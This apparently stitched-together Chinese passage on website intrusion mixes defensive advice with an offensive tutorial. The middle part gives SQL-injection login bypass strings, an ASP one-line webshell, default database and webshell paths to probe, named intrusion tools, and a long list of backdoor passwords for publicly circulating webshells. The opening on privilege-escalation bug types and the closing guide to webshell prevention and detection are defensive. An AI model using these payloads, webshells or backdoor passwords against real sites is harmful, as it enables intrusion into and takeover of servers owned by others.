取敏感文件或目录的信息，例如数据库配置文件、源代码文件等，进而利用这些信息来提升自己的权限。

4. 命令注入漏洞：攻击者在Web应用程序的输入字段中输入恶意的命令或代码，当应用程序执行这些命令或代码时，攻击者可以控制应用程序的行为。

通过命令注入漏洞，攻击者可以执行任意的系统命令，进而提升自己的权限。

要防止Web提权漏洞，应该加强Web应用程序的安全性，包括输入验证、输出编码、参数化查询等措施。

同时，应该及时更新和修补已知的漏洞，并定期进行安全审计和代码审查，以确保应用程序的安全性。

如何快速⼊侵⼀个⽹站⾸先，观察指定⽹站。

⼊侵指定⽹站是需要条件的：要先观察这个⽹站是动态还是静态的。

⾸先介绍下什么样站点可以⼊侵：我认为必须是动态的⽹站如ASP、、 JSP等代码编写的站点如果是静态的（.htm或html）,⼀般是不会成功的。

如果要⼊侵的⽬标⽹站是动态的，就可以利⽤动态⽹站的漏洞进⾏⼊侵。

Quote: 以下是⼊侵⽹站常⽤⽅法：1.上传漏洞如果看到:选择你要上传的⽂件 [重新上传]或者出现“请登陆后使⽤”，80%就有漏洞了！有时上传不⼀定会成功,这是因为Cookies不⼀样.我们就要⽤WSockExpert取得Cookies.再⽤DOMAIN上传.　2.注⼊漏洞字符过滤不严造成的3.暴库:把⼆级⽬录中间的/换成%5c 4.’or’=’or’这是⼀个可以连接SQL的语名句.可以直接进⼊后台。

我收集了⼀下。

类似的还有：　’or’’=’　\" or \"a\"=\"a ’) or (’a’=’a \") or (\"a\"=\"a or 1=1-- ’ or ’a’=’a5.社会⼯程学。

这个我们都知道吧。

就是猜解。

　6.写⼊ASP格式。

就是⼀句话⽊马〈%execute request(\"value\")%〉（数据库必需得是ASP或ASA的后缀） 7.源码利⽤：⼀些⽹站⽤的都是⽹上下载的源码.有的站长很懒.什么也不改. ⽐如：默认数据库，默认后台地址，默认管理员帐号密码等 8.默认数据库/webshell路径利⽤:这样的⽹站很多/利⼈别⼈的WEBSHELL. /Databackup/dvbbs7.MDB /bbs/Databackup/dvbbs7.MDB /bbs/Data/dvbbs7.MDB /data/dvbbs7.mdb /bbs/diy.asp /diy.asp /bbs/cmd.asp /bbs/cmd.exe /bbs/s-u.exe /bbs/servu.exe ⼯具：⽹站猎⼿　挖掘鸡明⼩⼦9.查看⽬录法:⼀些⽹站可以断开⽬录，可以访问⽬录。

最强⿊吃⿊：WEBSHELL⼤马隐藏万能密码⼤全因为很多原因，很多新⼿都不会编写⾃⼰的⼤马，⼤多数新⼿都会通过百度去下载对应脚本的⼤马，然⽽这些webshell⼤马都是早期流传出来的，基本上都存在后门，可以通过万能密码登录，即使你修改i过密码了，怎么样是不是很可怕？下⾯⼩编就将这些万能密码分享给⼤家吧！⿊⽻基地免杀asp⼤马密码5201314Hacked By CHINA! 密码chinaAsp站长助⼿6.0 密码584521web综合安全评测 – Beta3 密码nohack未知数X 密码45189946baidu｝” 密码baidu路遥知马⼒密码123⿊客⽹站之家美化版密码chenxueThé、End.゛密码and QQ：2780217151笑佛天下密码cnot西域⼩刚-站长助⼿-修改版本密码xxoxxXXXXX 密码rinima暗组超强功能修正去后门加强S-U提权版密码hkk007⿊客官⽅-长期提供⽹站⼊侵,密码破解数据库⼊侵密码chengnuoASPAdmin_A 密码”5556661221″ ‘123456⽕狐ASP⽊马(超强版)” 密码wrsk⾬夜孤魂密码54321Dark Security Team 密码yuemo 或者xingainian随风⾃由的泪密码jcksyes伟⼤的农民密码521mr.con asp⼩马密码*******JspX 密码4lert围剿专版密码yuemo或者5201314maek dream 密码hackerShell 密码xxxxx靈魂◆安全⼩组+” 密码10011C120105101银河安全⽹密码fclsharkASPXSpy 密码19880118Dark 密码376186027No Backdoor Webshell(⼑) 密码admin⿊勇⼠shell勇⼠版密码654321⼩武来了密码535039Evil sadness 密码adminF.S.T 联盟交流群内部版别外传噢密码000独⾃等待专⽤密码123windows 密码 123[D.s.T]会员专⽤WebShell 密码darkst我要进去’ 密码jcksyesHacker‘Rose 密码123456随风⾃由的泪密码jcksyesF.S.T 海盗内部版.!别外传噢。

WebShell防范与检查方法简介WebShell是指攻击者在受害者的Web服务器上安装的一种命令执行环境，攻击者通过WebShell可以进行各种恶意操作，例如：窃取敏感信息，篡改Web页面等。

由于WebShell具有隐藏性、易传播性、难以追踪的特点，成为了黑客攻击中的重要利器。

本文将介绍一些WebShell的防范与检查方法。

一、完善Web服务器安全配置Web服务器安全配置是WebShell防范的首要步骤。

通常情况下，WebShell都是通过攻击Web服务器漏洞来获得权限的。

因此，我们需要根据不同的Web服务器类型，及时更新修补程序，关闭不必要的服务和端口，建立安全的操作规范，避免人为失误或疏忽，导致系统被黑客攻击。

二、加强Web应用程序的安全性Web应用程序通常包含大量的业务逻辑处理和数据交互，在编写时容易受到攻击者的利用。

因此，我们要编写安全性能强、漏洞少的Web应用程序，对输入输出进行充分验证和过滤，禁止上传危险文件类型等。

同时，Web应用程序的日志安全要得到重视，以便排查安全事件的发生。

三、定期查杀病毒攻击者往往通过上传WebShell来控制服务器，而WebShell通常藏匿于一些正常的程序中。

因此，我们需要定期查杀Web服务器当前运行的进程和文件，检查是否存在黑客留下的病毒和木马程序。

如果发现可疑文件，立即进行隔离和处理。

四、加强日志监测WebShell存在的最大特点是难以被发现，因此，及时发现WebShell 的存在非常重要。

我们可以通过监测系统安全日志、Web服务器日志等方式，及时发现WebShell的攻击行为，快速进行处理。

同时，我们要做好归档日志，以便在安全事件发生时，对安全事件进行事后溯源。

五、加强权限控制尽可能地减少Web服务器运行的权限，限制Web应用程序访问系统资源的权限，可以有效降低WebShell攻击的风险。

只有超级管理员才有最高权限，其他用户只拥有所需的最小权限，最大程度地保护Web服务器的安全。